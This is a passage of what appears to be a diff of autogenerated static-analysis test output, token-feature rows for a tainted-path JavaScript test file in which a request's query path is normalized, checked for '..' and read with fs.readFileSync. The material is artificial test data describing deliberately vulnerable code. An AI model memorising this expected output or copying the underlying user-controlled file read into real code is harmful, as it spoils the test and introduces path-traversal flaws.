| path | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:160:7:160:49 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:160:7:160:49 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:160:7:160:49 | path = ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:160:7:160:49 | path = ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:160:7:160:49 | path = ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:160:7:160:49 | path = ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:160:7:160:49 | path = ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:160:14:160:23 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:160:14:160:23 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:160:14:160:23 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:160:14:160:23 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:160:14:160:23 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:160:14:160:33 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:160:14:160:33 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:160:14:160:33 | pathModule.normalize | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:160:14:160:33 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:160:14:160:33 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:160:14:160:49 | exceptional return of pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:160:14:160:49 | exceptional return of pathMod ... y.path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:160:14:160:49 | exceptional return of pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:160:14:160:49 | exceptional return of pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:160:14:160:49 | exceptional return of pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:160:14:160:49 | pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:160:14:160:49 | pathMod ... y.path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:160:14:160:49 | pathMod ... y.path) | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:160:14:160:49 | pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:160:14:160:49 | pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:160:25:160:33 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:160:25:160:33 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:160:25:160:33 | normalize | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:160:25:160:33 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:160:25:160:33 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:160:35:160:37 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:160:35:160:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:160:35:160:37 | req | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:160:35:160:37 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:160:35:160:37 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:160:35:160:43 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:160:35:160:43 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:160:35:160:43 | req.query | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:160:35:160:43 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:160:35:160:43 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:160:35:160:48 | req.query.path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:160:35:160:48 | req.query.path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:160:35:160:48 | req.query.path | calleeImports | path | @@ -8430,6 +73751,41 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:160:35:160:48 | req.query.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:160:35:160:48 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:160:35:160:48 | req.query.path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:160:39:160:43 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:160:39:160:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:160:39:160:43 | query | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:160:39:160:43 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:160:39:160:43 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:160:45:160:48 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:160:45:160:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:160:45:160:48 | path | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:160:45:160:48 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:160:45:160:48 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:10 | path | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:19 | path.includes | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:19 | path.includes | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:19 | path.includes | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:19 | path.includes | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:19 | path.includes | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:25 | exceptional return of path.includes('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:25 | exceptional return of path.includes('..') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:25 | exceptional return of path.includes('..') | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:25 | exceptional return of path.includes('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:25 | exceptional return of path.includes('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:25 | path.includes('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:25 | path.includes('..') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:25 | path.includes('..') | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:25 | path.includes('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:162:7:162:25 | path.includes('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:162:12:162:19 | includes | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:162:12:162:19 | includes | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:162:12:162:19 | includes | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:162:12:162:19 | includes | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:162:12:162:19 | includes | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:162:21:162:24 | '..' | CalleeFlexibleAccessPath | path.includes | | autogenerated/TaintedPath/normalizedPaths.js:162:21:162:24 | '..' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:162:21:162:24 | '..' | calleeImports | path | @@ -8439,6 +73795,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:162:21:162:24 | '..' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:162:21:162:24 | '..' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:162:21:162:24 | '..' | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:4 | fs | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:17 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:23 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:23 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:165:3:165:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:165:6:165:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:165:6:165:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:165:6:165:17 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:165:6:165:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:165:6:165:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:165:19:165:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:165:19:165:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:165:19:165:22 | path | calleeImports | fs | @@ -8448,6 +73829,61 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:165:19:165:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:165:19:165:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:165:19:165:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:167:7:167:34 | !pathMo ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:167:7:167:34 | !pathMo ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:167:7:167:34 | !pathMo ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:167:7:167:34 | !pathMo ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:167:7:167:34 | !pathMo ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:17 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:17 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:17 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:17 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:17 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:28 | pathMod ... bsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:28 | pathMod ... bsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:28 | pathMod ... bsolute | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:28 | pathMod ... bsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:28 | pathMod ... bsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:34 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:34 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:34 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:34 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:34 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:34 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:34 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:34 | pathMod ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:34 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:167:8:167:34 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:167:19:167:28 | isAbsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:167:19:167:28 | isAbsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:167:19:167:28 | isAbsolute | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:167:19:167:28 | isAbsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:167:19:167:28 | isAbsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:168:5:168:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:168:8:168:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:168:8:168:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:168:8:168:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:168:8:168:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:168:8:168:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:168:21:168:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:168:21:168:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:168:21:168:24 | path | calleeImports | fs | @@ -8457,6 +73893,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:168:21:168:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:168:21:168:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:168:21:168:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:170:5:170:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:170:8:170:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:170:8:170:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:170:8:170:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path path includes .. fs readFileSync path pathModule isAbsolute path fs 